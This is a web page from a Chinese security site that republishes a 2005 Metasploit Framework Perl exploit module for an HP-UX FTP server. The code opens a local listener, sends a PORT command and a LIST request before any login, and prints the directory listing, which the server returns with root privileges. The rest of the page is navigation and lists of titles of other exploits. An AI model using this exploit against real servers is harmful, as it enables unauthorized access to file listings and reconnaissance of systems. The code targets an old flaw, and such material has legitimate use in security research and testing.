首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP-UX FTP Server Pre-authentication Remote Directory Listing Exploit
来源:optyx@uberhax0r.net 作者:Optyx 发布时间:2005-10-19  

HP-UX FTP Server Pre-authentication Remote Directory Listing Exploit


##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::hpux_ftpd_preauth_list;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'HP-UX FTP Server Preauthentication Directory Listing',
'Version' => '$Revision: 1.8 $',
'Authors' => [ 'Optyx <optyx [at] uberhax0r.net>'],
'Arch' => [ ],
'OS' => [ 'hpux' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The FTP server port', 21],
'RPATH' => [1, 'DATA', 'The path name to list', "/"],
},

'Description' => Pex::Text::Freeform(qq{
This exploit abuses an unpublished vulnerability in the HP-UX FTP
service. This flaw allows an unauthenticated remote user to obtain
directory listings from this server with the privileges of the root
user. This vulnerability was silently patched by HP sometime between
2001 and 2003.
}),
'Refs' =>
[
# None
],

'Keys' => ['ftp'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('RPATH');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

my $l = IO::Socket::INET->new
(
Proto => 'tcp',
Listen => 5,
Blocking => 0,
ReuseAddr => 1,
);

my $r;
my $prt = ",".int($l->sockport / 256).",".int($l->sockport % 256);
my $sel = IO::Select->new($l);
my $cmd = "PORT ".join(",", split(/\./,Pex::InternetIP($target_host))).$prt."\r\n";

$r .= $s->Recv(-1, 5);

$s->Send($cmd);
$r .= $s->Recv(-1, 5);

$s->Send("LIST $target_path\r\n");
$r .= $s->Recv(-1, 5);
$s->Close;

foreach (split(/\n/, $r)) {
chomp;
$self->PrintLine("[*] $_");
}

my @rdy = $sel->can_read(3);
if (scalar(@rdy)) {
my $x = $l->accept();
$self->PrintLine("[*] Accepted connection from ".$x->sockhost.":".$x->sockport);

while (<$x>) {
chomp;
$self->PrintLine($_);
}
$x->shutdown(2);
$x->close;
}
$l->shutdown(2);
$l->close;
return;
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·TYPSoft FTP Server RETR DoS
·Computer Associates Unicenter
·Lynx Browser NNTP Handling Rem
·HP-UX LPD Service Buffer Overf
·Microsoft Collaboration Data O
·MailEnable Pro 1.x STATUS Comm
·Microsoft Windows Network Conn
·RSA SecurID Web Agent IISWebAg
·Microsoft Windows FTP Client F
·MySpace Worm Source Code
·MailEnable Logging Buffer Over
·XMail -t Command Line Option H
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved